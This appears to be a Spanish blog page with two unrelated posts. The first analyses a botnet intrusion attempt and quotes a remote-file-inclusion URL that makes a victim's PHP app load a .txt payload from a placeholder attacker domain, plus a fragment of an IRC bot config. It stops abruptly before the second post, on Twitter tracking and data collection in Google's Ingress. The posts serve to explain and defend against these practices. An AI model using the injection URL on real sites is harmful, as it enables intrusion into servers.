Analizando una Botnet y buscando a sus administradores.

Hace unos días un conocido me comentó que alguien había intentado acceder a su web y había tratado inyectar una URL, pero la forma de hacerlo no tenía sentido. Me llamó la atención y le dije que me enviase ejemplos de lo que habían tratado de hacer.

Intento de explotación de un LFI:

www.dominiovictima.com/gratis//appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Analizando la URL atacada podemos ver dos partes claramente diferenciadas, la url víctima y la inyección, en esta última vemos otra URL que contiene un archivo .txt:

/appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Vamos a ver el contenido de ese sospechoso txt que podeis encontrar aqui:

<?php
var $config = array("server"=>"irc.dominio.net", 
                     "port"=>"6667",   
                     "pass"=>"",  
                     "prefix"=>"BoT",  
                     "maxrand"=>"5",  
                     "chan"=>"#channel",  
                     "chan2"=>"#channel", 
                     "key"=>"senhadocanal",     
                     "modes"=>"+p",            
                     "password"=>"terpmak",          
                     "trigger"=>".",  
                     "hostauth"=>"127.0.0.1" 
                     );
?>

A simple vista lo primero que llama la atención son tres cosas, una cabecera bastante descriptiva de lo que hace el script, unas líneas de configuración y un footer con el nombre de una comunidad.

El rastreo de usuarios y la recopilación de información en segundo plano

El espía de tu bolsillo

Hace unos días Del Harvey reveló en la SMX Social Media Marketing 2012 que Twitter rastrea las costumbres de navegación de sus usuarios para así crear un perfil del usuario y poder proporcionar recomendaciones personalizadas de "A quien seguir", si bien esto no es nada nuevo ya que LinkedIn, Facebook, Youtube y muchas otras empresas lo hacen, la motivación para escribir esta entrada viene de otro servicio que se ha abierto al público - con acceso a la beta - hace poco de la mano de Google, el juego de realidad aumentada "Ingress".

Ingress es a grandes rasgos un juego "novedoso" para smartphones que nos invita a pasear por las calles hackeando puntos de energía y apoderarnos de ellos formando parte de uno de los dos bandos posibles, para ello se vale de la ayuda de nuestro GPS, acelerómetros y cámara para crear una experiencia de usuario atrayente. Si nos paramos a leer un poco los requisitos del juego solo hay que sumar 2+2 para darse cuenta de que Google no crea juegos por amor al arte:

Al mas puro estilo de Stargate Universe - cuando Eli resuelve un enigma para el gobierno a traves de un juego -, Google parece estar usando un videojuego para recopilar información de los usuarios y añadirla presumiblemente a Google Maps. El problema viene cuando el 90% de los usuarios no se dan cuenta de toda la información que regalan libremente y sin consentimiento a un tercero, ya sea sus hábitos de navegación, su posición, sus gustos o cualquier otra cosa que se os ocurra.

Un frase que me gusta repetir es "Todo lo que compartas será público algún dia", así que mejor estar enterado de a donde va toda tu información. 

Para evitar el rastreo por parte de las compañías existen extensiones como "Do Not Track" que podéis descargar para Firefox o Chrome o activar la opción de algunos navegadores. Para casos como el de Ingress lo mejor es estar enterado de las condiciones de servicio y de a donde va a parar la información.